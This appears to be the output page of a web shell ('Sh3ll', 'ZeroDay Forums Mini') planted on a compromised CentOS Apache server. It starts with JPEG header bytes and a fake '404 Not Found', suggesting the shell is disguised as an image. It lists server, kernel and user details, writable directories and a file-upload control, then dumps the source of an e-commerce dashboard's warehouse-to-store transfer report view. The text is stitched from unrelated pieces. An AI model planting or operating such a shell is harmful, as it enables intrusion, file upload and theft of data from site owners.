����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/adimi/application/modules/dashboard/views/report/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/adimi/application/modules/dashboard/views/report/warehouse_to_store_transfer.php
<?php defined('BASEPATH') OR exit('No direct script access allowed');?>
<!-- Wearhouse to store transfer -->
<div class="content-wrapper">
	<section class="content-header">
	    <div class="header-icon">
	        <i class="pe-7s-note2"></i>
	    </div>
	    <div class="header-title">
	        <h1><?php echo display('warehouse_to_store_transfer') ?></h1>
	        <small><?php echo display('warehouse_to_store_transfer') ?></small>
	        <ol class="breadcrumb">
	            <li><a href="index.html"><i class="pe-7s-home"></i> <?php echo display('home') ?></a></li>
	            <li><a href="#"><?php echo display('report') ?></a></li>
	            <li class="active"><?php echo display('warehouse_to_store_transfer') ?></li>
	        </ol>
	    </div>
	</section>

	<section class="content">
		<div class="row">
            <div class="col-sm-12">
                <div class="column">
                	<?php if($this->permission->check_label('sales_report')->read()->access()){?>
                	<a href="<?php echo base_url('Admin_dashboard/todays_sales_report')?>" class="btn btn-info m-b-5 m-r-2">
                		<i class="ti-align-justify"></i><?php echo display('sales_report')?>
                	</a>
                	<?php } ?>
                </div>
            </div>
        </div>

		<!-- Store To Store -->
		<div class="row">
			<div class="col-sm-12">
		        <div class="panel panel-default">
		            <div class="panel-body"> 
		                <?php echo form_open('Admin_dashboard/warehouse_to_store_transfer',array('class' => ''))?>
		                    <?php date_default_timezone_set(DEF_TIMEZONE); $today = date('m-d-Y'); ?>
	                        <div class="form-group row">
	                            <label for="wearhouse" class="col-sm-2 col-form-label"><?php echo display('wearhouse') ?>:</label>
	                            <div class="col-sm-4">
	                                <select class="form-control" name="wearhouse" id="wearhouse"  required="">
	                                <option value=""></option>
			                        {wearhouse_list}
			                        <option value="{wearhouse_id}">{wearhouse_name}</option>
			                        {/wearhouse_list}
			                        </select>
	                            </div>
	                        </div>

	                        <div class="form-group row">
	                            <label for="t_store" class="col-sm-2 col-form-label"><?php echo display('store') ?>:</label>
	                            <div class="col-sm-4">
	                                <select class="form-control" name="t_store" id="t_store"  required="">
	                                <option value=""></option>
			                        {store_list}
			                        <option value="{store_id}">{store_name}</option>
			                        {/store_list}
			                        </select>
	                            </div>
	                        </div>

		                    <div class="form-group row">
		                        <label for="supplier_name" class="col-sm-2 col-form-label"><?php echo display('start_date') ?>:</label>
		                        <div class="col-sm-4">
			                        <input type="text" name="from_date" class="form-control datepicker" id="from_date" placeholder="<?php echo display('start_date') ?>" >
			                    </div>
		                    </div> 

		                    <div class="form-group row">
		                        <label or="supplier_name" class="col-sm-2 col-form-label"><?php echo display('end_date') ?>:</label>
		                        <div class="col-sm-4">
			                        <input type="text" name="to_date" class="form-control datepicker" id="to_date" value="<?php echo $today?>" placeholder="<?php echo display('end_date') ?>">
			                    </div>
		                    </div>         

		                    <div class="form-group row">
		                        <label or="supplier_name" class="col-sm-3 col-form-label"></label>
		                        <div class="col-sm-4">
			                        <button type="submit" class="btn btn-success"><?php echo display('search') ?></button>
			                    </div>
		                    </div>
		               <?php echo form_close()?>
		            </div>
		        </div>
		    </div>
	    </div>

	    <!-- Warehouse to store transfer -->
		<div class="row">
		    <div class="col-sm-12">
		        <div class="panel panel-bd lobidrag">
		            <div class="panel-heading">
		                <div class="panel-title">
		                    <h4><?php echo display('warehouse_to_store_transfer') ?> </h4>
		                </div>
		            </div>
		            <div class="panel-body">
		                <div class="table-responsive">
		                    <table id="dataTableExample2" class="table table-bordered table-striped table-hover">
		                        <thead>
		                            <tr>
		                                <th><?php echo display('date') ?></th>
										<th><?php echo display('wearhouse') ?></th>
										<th><?php echo display('store') ?></th>
										<th><?php echo display('product') ?></th>
										<th><?php echo display('variant') ?></th>
										<th><?php echo display('quantity') ?></th>
		                            </tr>
		                        </thead>
		                        <tbody>
		                        <?php if ($warehouse_to_store_transfer) { foreach ($warehouse_to_store_transfer as $report) { ?>
		                            <tr>
										<td><?php echo html_escape($report['date_time'])?></td>
										<td><?php echo html_escape($report['wearhouse_name'])?></td>
										<td><?php echo html_escape($report['store_name'])?></td>
										<td><?php echo html_escape($report['product_name'].'-('.$report['product_model'].')')?></td>
										<td><?php echo html_escape($report['variant_name'])?></td>
										<td><?php echo abs($report['quantity'])?></td>
									</tr>
								<?php } } ?>
		                        </tbody>
		                    </table>
		                </div>
		            </div>
		        </div>
		    </div>
		</div>
	</section>
</div>
<!-- Wearhouse to store transfer -->

ZeroDay Forums Mini